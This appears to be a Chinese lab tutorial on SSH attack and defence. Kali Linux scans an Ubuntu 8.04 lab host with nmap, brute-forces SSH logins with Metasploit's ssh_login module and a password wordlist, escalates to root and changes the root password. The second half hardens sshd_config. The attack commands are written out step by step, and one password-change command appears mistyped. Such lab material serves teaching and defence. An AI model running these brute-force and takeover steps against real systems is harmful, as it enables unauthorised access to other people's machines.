网络安全: Kali Linux 进行 SSH 渗透与防御

目录

一、实验

1.环境

2.nmap扫描目标主机

[3.Kali Linux 进行 SSH 渗透](#3.Kali Linux 进行 SSH 渗透)

[3.Kali Linux 进行 SSH 防御](#3.Kali Linux 进行 SSH 防御)

二、问题

1.SSH有哪些安全配置


一、实验

1.环境

(1)主机

表1 主机

|------------|--------|---------------------|-------------------|
| 系统 | 版本 | IP | 备注 |
| Kali Linux | 2022.4 | 192.168.204.154(动态) | |
| Ubuntu | 8.04 | 192.168.204.143 | Kali(2022.4)的目标主机 |

(2)查看Kali Linux (2022.4)系统版本

bash 复制代码
cat /etc/os-release

(3) 查看Kali Linux (2022.4)系统IP地址

bash 复制代码
ip addr | grep 154

(4)查看Ubuntu 8.04 系统版本及IP地址

bash 复制代码
lsb_release -a
bash 复制代码
ip addr

2.nmap扫描目标主机

(1)扫描⽬标主机所在⽹段所有存活的主机

 nmap -sP 192.168.204.0/24

(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本

22端口已开放

nmap -sV 192.168.204.143

3.Kali Linux 进行 SSH 渗透

(1)进入MSF 控制台

bash 复制代码
msfconsole

(2) 搜索 ssh_login脚本

bash 复制代码
search ssh_login

(3) 使⽤编号为 0 的脚本

use 0

(4) 设置⽬标主机

bash 复制代码
 set rhosts 192.168.204.143

(4)查看选项

bash 复制代码
show options

(5)设置用户名与密码本

bash 复制代码
 set username msfadmin
bash 复制代码
set pass_file zidian.txt

(6)运⾏脚本

bash 复制代码
run 

(7)查看会话

bash 复制代码
sessions

(8)连接会话

bash 复制代码
sessions 1

查看用户身份

bash 复制代码
whoami

查看路径

bash 复制代码
pwd

提升权限

bash 复制代码
 sudo -i

再次查看用户身份

bash 复制代码
whoami

更改密码

bash 复制代码
password root

(9)MobaXterm远程连接

连接

3.Kali Linux 进行 SSH 防御

(1)SSH安全配置(端口)

bash 复制代码
vim /etc/ssh/sshd_config

修改端口

(2)重启

bash 复制代码
/etc/init.d/ssh  restart

(3)退出之前的MSF

(5)进入MSF 控制台

bash 复制代码
msfconsole

(6) 搜索 ssh_login脚本

bash 复制代码
search ssh_login

(6) 使⽤编号为 0 的脚本

bash 复制代码
use 0

(7) 设置⽬标主机

bash 复制代码
 set rhosts 192.168.204.143

(8)设置用户名与密码本

bash 复制代码
 set username msfadmin
bash 复制代码
set pass_file zidian.txt

(9)运⾏脚本

失败

bash 复制代码
run 

(10)nmap扫描端口

ssh端口为12345

bash 复制代码
nmap -sV 192.168.204.143

(11)查看选项

bash 复制代码
show options

(12) 设置目标端口

bash 复制代码
set rport 12345

(13)运⾏脚本

bash 复制代码
run 

( 14)SSH安全配置(端口)

bash 复制代码
vim /etc/ssh/sshd_config

修改登录验证时间

(15)重启

bash 复制代码
/etc/init.d/ssh  restart

(16)验证(等待1分钟)

(17)SSH安全配置(容错次数)

bash 复制代码
vim /etc/ssh/sshd_config

修改容错次数

(18)重启

bash 复制代码
/etc/init.d/ssh  restart

(19)容错2次

二、问题

1.SSH有哪些安全配置

(1)配置

bash 复制代码
Port 12345            //端口                                  
LoginGraceTime 1m     //登录验证耗时                               
PermitRootLogin no    //不允许root远程登录                              
MaxAuthTries 2        //最大容错次数2                                
AllowUsers msfadmin@192.168.204.100    //允许指定用户在指定IP上登录

2.MSF 退出报错

(1)报错

bash 复制代码
[*] You have active sessions open, to exit anyway type "exit -y"

(2)原因分析

有session会话正在运行。

(3)解决方法

bash 复制代码
exit -y
相关推荐
程序猿编码38 分钟前
自定义命令执行器:C++中命令封装的深度探索(C/C++实现)
linux·c语言·c++·网络安全·shell·命令行
神秘剑客_CN1 小时前
使用windows笔记本让服务器上网
运维·服务器·windows
黑牛先生3 小时前
【Linux】动静态库
linux·运维·服务器
vortex53 小时前
Shell基础:中括号的使用
linux·运维·bash·shell
基哥的奋斗历程3 小时前
Docker 常用命令
运维·docker·容器
HEX9CF5 小时前
【Docker】快速部署 Nacos 注册中心
运维·docker·容器
从未止步..6 小时前
Jenkins未在第一次登录后设置用户名,第二次登录不进去怎么办?
java·运维·jenkins
davenian6 小时前
< OS 有关> BaiduPCS-Go 程序的 菜单脚本 Script: BaiduPCS-Go.Menu.sh (bdgo.sh)
运维·shell script·baidupcs-go·linux ubuntu
大秦王多鱼7 小时前
Kafka SASL/SCRAM介绍
分布式·安全·kafka·apache